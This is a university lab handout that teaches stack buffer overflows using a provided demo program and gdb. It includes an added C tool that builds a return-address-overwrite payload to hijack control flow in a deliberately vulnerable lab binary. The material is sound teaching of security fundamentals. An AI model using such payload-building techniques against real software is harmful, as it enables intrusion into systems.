CS 270 Lab 4: Introduction to Buffer Overflows

This lab introduces you to buffer overflows. Please follow the instructions given below, adapted from an exercise produced by Bryant and O'Hallaron, the authors of our textbook.

  1. wget http://www.cs.uky.edu/~raphael/courses/CS270/laboratory4/bufdemo.tar.gz
  2. tar -vzxf bufdemo.tar.gz
  3. cd bufdemo; less bufdemo.c
  4. Read the program.
  5. make
  6. Notice the compile-time warnings.
  7. ./bufdemo
  8. Type 123 when prompted. You should see the expected output:
      Abuf = ''
      Bbuf = '123'

Basic buffer-overflow exercises

  1. Refer to the stack-layout diagram that accompanies this lab (the picture itself is not reproduced in this text).
  2. Run script mysession.txt to start recording a transcript in mysession.txt, as usual. To type in answers to the questions, run cat > /dev/null and then type your answer. After you have typed your answer, press Control-D (end of file) to finish it.
  3. Find an input string that results in the program printing
        Abuf = ''
        Bbuf = '1234'
  4. Type make asm to get an objdump listing in bufdemo.s. How much space does gcc allocate to each array of 4 characters?
  5. Find an input string that results in the program printing
        Abuf = 'efghijk'
        Bbuf = 'abcdefghijk'
  6. Give abcdefghijklmnopqrstuvwxyz as input. What is the output? Why?
  7. Run the program under gdb (script should still be running) and set a breakpoint just before returning from echo() (You can put the breakpoint at line 14, which is the closing '}'). Run the program and type abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrst as the input. Single-step (stepi) the program past the return from echo(). Does the echo() procedure return to main()? Explain what is happening.

    As you single-step through the instructions in gdb, you may find it useful to set up this display:

          display/5i $pc

    Then every time gdb stops at a breakpoint or after a stepi or nexti command, it shows the next 5 assembler instructions, starting with the one about to execute.

    As echo() is about to return to main() (that is, when the next instruction to execute is ret), you might want to look at the return address, which is the 8-byte word pointed to by $rsp, in several ways:

          x/x $rsp
          x/4c $rsp
          x/s $rsp

    Keep in mind what each of these shows: x/x prints a 4-byte word unless you have already used a larger unit size (x/gx prints the full 8-byte return address), x/4c prints only the first 4 bytes of the return address as characters, and x/s prints bytes as a string until it reaches a NUL, so it can run past the return address into whatever follows it on the stack.

Advanced buffer-overflow exercise

In the bufdemo directory is a file called oflow_echo.c. You can compile it with make GOAL=oflow_echo.

Try to find an input string that causes the oflow_echo program to call the not_called() procedure. You can verify that oflow_echo.c never calls not_called(), so you need to use a buffer-overflow attack (described below) to fool the code into jumping to not_called().

You need to create a binary exploit string to send as input to the program. To create an exploit string, you can use the hex2raw program, which is in the bufdemo directory you have already built. hex2raw takes as input a hex-formatted string, in which each byte is represented by two hex digits. For example, the ASCII string 012345 is represented in hex format as 30 31 32 33 34 35, because the ASCII code for decimal digit n is 0x3n.

Separate the hex byte values you pass to hex2raw by whitespace (blanks or newlines). I recommend separating different parts of your exploit string with newlines while you're working on this puzzle. hex2raw also supports C-style block comments, so you can mark off sections of your exploit string. For example:

      bf 66 7b 32 78 /* some arbitrary bytes */

Be sure to leave space around both the starting and ending comment strings (/*, */) so they are properly ignored.

Place your hex-formatted exploit string in the file exploit.txt. From it, build a binary file like this:

      ./hex2raw < exploit.txt > exploit.raw

Run oflow_echo from gdb in order to get consistent results: gdb turns off address-space layout randomization for the program it runs, so stack addresses are the same from run to run, whereas outside gdb Linux randomizes them. Inside gdb, you can say:

      (gdb) run < exploit.raw | head

to start the program. This command pipes the output through head to protect you from unbounded output, which can happen if you provide some invalid inputs in exploit.raw.
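
As an added example (not part of the original lab, and not the course's own hex2raw program), here is a C reimplementation of the hex2raw input format described above, together with a small generator that lays out a return-address-overwrite payload in that format. The decoder accepts exactly what the text specifies: byte values as pairs of hex digits separated by whitespace, with C-style block comments ignored; the real hex2raw may differ in how it treats malformed input. The generator assumes an x86-64 target (an 8-byte little-endian return address) and assumes the victim reads its line with gets(), which stops at a newline, so it refuses any target address containing a 0x0a byte. The padding length 12 and the address 0x401136 used as defaults in main() are placeholders: in the lab you take the padding from your objdump and gdb measurements and the target from the address of not_called() in the disassembly.

```c
/* Added example: decoder for the hex2raw text format plus a payload
 * generator that writes that format. Not the course's hex2raw program. */
#include <ctype.h>
#include <stdarg.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Value of one hex digit, or -1 if c is not a hex digit. */
static int hexval(int c) {
    if (c >= '0' && c <= '9') return c - '0';
    c = tolower(c);
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return -1;
}

/* Decode hex2raw-style text: each byte is two hex digits, bytes are separated
 * by whitespace, and C-style block comments are ignored. Writes the bytes to
 * out and returns how many, or -1 on malformed input (a lone hex digit, a
 * non-hex character, an unterminated comment, or out too small). */
long hex2raw_decode(const char *text, unsigned char *out, size_t cap) {
    size_t n = 0;
    const char *p = text;
    while (*p) {
        if (isspace((unsigned char)*p)) { p++; continue; }
        if (p[0] == '/' && p[1] == '*') {          /* skip a block comment */
            const char *end = strstr(p + 2, "*/");
            if (end == NULL) return -1;            /* unterminated comment */
            p = end + 2;
            continue;
        }
        int hi = hexval((unsigned char)p[0]);
        int lo = p[1] ? hexval((unsigned char)p[1]) : -1;
        if (hi < 0 || lo < 0) return -1;           /* not a full hex pair */
        if (n >= cap) return -1;
        out[n++] = (unsigned char)(hi << 4 | lo);
        p += 2;
    }
    return (long)n;
}

/* Append formatted text at out[*used]; -1 if it would not fit in cap. */
static int emit(char *out, size_t cap, size_t *used, const char *fmt, ...) {
    va_list ap;
    va_start(ap, fmt);
    int w = vsnprintf(out + *used, cap - *used, fmt, ap);
    va_end(ap);
    if (w < 0 || (size_t)w >= cap - *used) return -1;
    *used += (size_t)w;
    return 0;
}

/* Write, as hex2raw text, `pad` filler bytes (0x41, 'A') that reach from the
 * start of the overflowed buffer to the saved return address, followed by the
 * 8-byte little-endian encoding of `target` (x86-64 return-address width).
 * Assumes the victim reads its input with gets(), which stops at a newline,
 * so a target containing a 0x0a byte is rejected. Returns the number of
 * characters written, or -1 on failure. */
long build_payload_hex(size_t pad, uint64_t target, char *out, size_t cap) {
    size_t used = 0;
    if (cap == 0) return -1;
    out[0] = '\0';
    if (emit(out, cap, &used, "/* %zu filler bytes up to the saved return address */\n", pad))
        return -1;
    for (size_t i = 0; i < pad; i++)
        if (emit(out, cap, &used, "41%c", i + 1 == pad ? '\n' : ' ')) return -1;
    if (emit(out, cap, &used, "/* new return address, little-endian */\n")) return -1;
    for (int i = 0; i < 8; i++) {
        unsigned b = (unsigned)((target >> (8 * i)) & 0xff);
        if (b == '\n') return -1;                  /* gets() would cut the line here */
        if (emit(out, cap, &used, "%02x%c", b, i == 7 ? '\n' : ' ')) return -1;
    }
    return (long)used;
}

int main(int argc, char **argv) {
    /* Placeholder values: take the real padding from your objdump/gdb
     * measurements and the real target from the address of not_called(). */
    size_t pad = argc > 1 ? (size_t)strtoull(argv[1], NULL, 0) : 12;
    uint64_t target = argc > 2 ? strtoull(argv[2], NULL, 0) : 0x401136ULL;
    char hex[4096];
    if (build_payload_hex(pad, target, hex, sizeof hex) < 0) {
        fprintf(stderr, "payload does not fit, or target contains a newline byte\n");
        return 1;
    }
    fputs(hex, stdout);                            /* redirect to exploit.txt */
    return 0;
}
```

Compile it on its own with gcc (the file name is your choice), then run it as ./a.out 12 0x401136 > exploit.txt with your own measured padding and target, and feed exploit.txt to ./hex2raw as above. The decoder is included so you can check, byte for byte, what the text you wrote turns into before you send it to oflow_echo; in particular it will tell you about a stray lone hex digit or an unclosed comment, which are the usual reasons a payload lands a few bytes off from where the stack diagram says it should.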


When you complete the exercises, submit your typescript file to the cs portal (https://www.cs.uky.edu/csportal).